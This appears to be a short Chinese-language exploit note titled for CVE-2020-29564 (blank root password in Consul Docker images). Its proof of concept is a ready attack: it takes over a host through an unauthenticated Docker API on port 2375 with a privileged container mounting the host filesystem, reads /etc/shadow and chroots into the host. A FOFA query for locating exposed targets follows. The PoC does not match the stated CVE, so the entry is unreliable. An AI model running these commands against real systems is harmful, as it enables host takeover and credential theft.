CVE-2020-29564 Consul Docker images 空密码登录漏洞.md
634 B / 2021-05-21 09:14:38
# CVE-2020-29564 Consul Docker images 空密码登录漏洞
Consul Docker images 0.7.1至1.4.2版本部署的Consul Docker容器的系统,可能允许远程攻击者使用空白密码来实现root用户访问。
**PoC:**
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
File Access: cat /mnt/etc/shadow
RCE: chroot /mnt
```
FOFA:
```
port="2375" && protocol=="docker"
```
**ref:**
* https://forum.ywhack.com/thread-114824-1-2.html
* https://github.com/koharin/koharin2/blob/main/CVE-2020-29564